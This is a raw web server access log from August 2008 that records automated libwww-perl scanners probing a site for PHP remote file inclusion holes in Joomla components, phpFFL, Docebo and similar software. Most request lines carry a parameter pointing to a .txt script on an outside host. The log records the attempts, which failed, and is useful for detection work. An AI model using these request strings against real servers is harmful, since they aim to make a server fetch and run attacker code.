200.203.121.1 - - [12/Aug/2008:09:58:47 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.abosaopaulo.org.br/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.141.50.212 - - [12/Aug/2008:09:58:47 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:09:58:49 -0700] "GET /logs/access_080114.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:09:58:49 -0700] "GET /logs/access_080320.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.203.121.1 - - [12/Aug/2008:09:58:52 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.abosaopaulo.org.br/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [12/Aug/2008:09:58:52 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.abosaopaulo.org.br/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [12/Aug/2008:09:58:53 -0700] "GET /logs/access_080209.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.abosaopaulo.org.br/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:59:10 -0700] "GET /logs//inc/download_center_lite.inc.php?script_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:59:12 -0700] "GET //inc/download_center_lite.inc.php?script_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:09:59:14 -0700] "GET /logs/access_080120.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:09:59:15 -0700] "GET /logs/access_080103.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:09:59:27 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:59:28 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:59:29 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:59:41 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:59:43 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
72.55.148.240 - - [12/Aug/2008:09:59:43 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:09:59:43 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:09:59:43 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:09:59:44 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:09:59:45 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:09:59:45 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:09:59:50 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:09:59:50 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:09:59:50 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:09:59:53 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:09:59:53 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:09:59:53 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:00:02 -0700] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:00:03 -0700] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:00:07 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:00:08 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:00:08 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:00:10 -0700] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:10:00:10 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:00:11 -0700] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:00:14 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:00:14 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:00:14 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:00:15 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:00:15 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:00:15 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:00:15 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:00:15 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:00:15 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:00:19 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:00:19 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.205.74.80 - - [12/Aug/2008:10:00:19 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [12/Aug/2008:10:00:19 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:00:19 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:00:19 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.205.74.80 - - [12/Aug/2008:10:00:19 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [12/Aug/2008:10:00:19 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:00:19 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:00:19 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.205.74.80 - - [12/Aug/2008:10:00:19 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [12/Aug/2008:10:00:19 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.127.68.188 - - [12/Aug/2008:10:00:20 -0700] "GET /logs/access_080320.log//atom.php5?page=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [12/Aug/2008:10:00:20 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [12/Aug/2008:10:00:20 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [12/Aug/2008:10:00:20 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [12/Aug/2008:10:00:20 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.127.68.188 - - [12/Aug/2008:10:00:20 -0700] "GET //atom.php5?page=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [12/Aug/2008:10:00:20 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [12/Aug/2008:10:00:20 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.127.68.188 - - [12/Aug/2008:10:00:20 -0700] "GET /logs//atom.php5?page=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:00:22 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:00:22 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:00:22 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:00:26 -0700] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.205.74.80 - - [12/Aug/2008:10:00:29 -0700] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [12/Aug/2008:10:00:29 -0700] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:00:30 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:00:30 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:00:30 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:00:31 -0700] "GET /logs/access_080126.log//components/com_simpleboard/image_upload.php?sbp=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.83.20 - - [12/Aug/2008:10:00:33 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.83.20 - - [12/Aug/2008:10:00:33 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.83.20 - - [12/Aug/2008:10:00:34 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.176.108 - - [12/Aug/2008:10:00:35 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.108 - - [12/Aug/2008:10:00:35 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.108 - - [12/Aug/2008:10:00:35 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.74.80 - - [12/Aug/2008:10:00:38 -0700] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.83.20 - - [12/Aug/2008:10:00:39 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [12/Aug/2008:10:00:39 -0700] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.83.20 - - [12/Aug/2008:10:00:40 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.83.20 - - [12/Aug/2008:10:00:40 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:00:40 -0700] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:00:43 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:00:43 -0700] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.176.108 - - [12/Aug/2008:10:00:43 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:00:43 -0700] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.176.108 - - [12/Aug/2008:10:00:44 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.108 - - [12/Aug/2008:10:00:44 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:00:44 -0700] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:00:44 -0700] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:00:47 -0700] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.127.68.188 - - [12/Aug/2008:10:00:47 -0700] "GET /logs/access_080320.log//atom.php5?page=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.127.68.188 - - [12/Aug/2008:10:00:48 -0700] "GET //atom.php5?page=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.127.68.188 - - [12/Aug/2008:10:00:48 -0700] "GET /logs//atom.php5?page=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:00:53 -0700] "GET /logs/access_080114.log//components/com_simpleboard/image_upload.php?sbp=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:00:53 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:00:54 -0700] "GET /logs/access_080122.log//components/com_simpleboard/image_upload.php?sbp=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
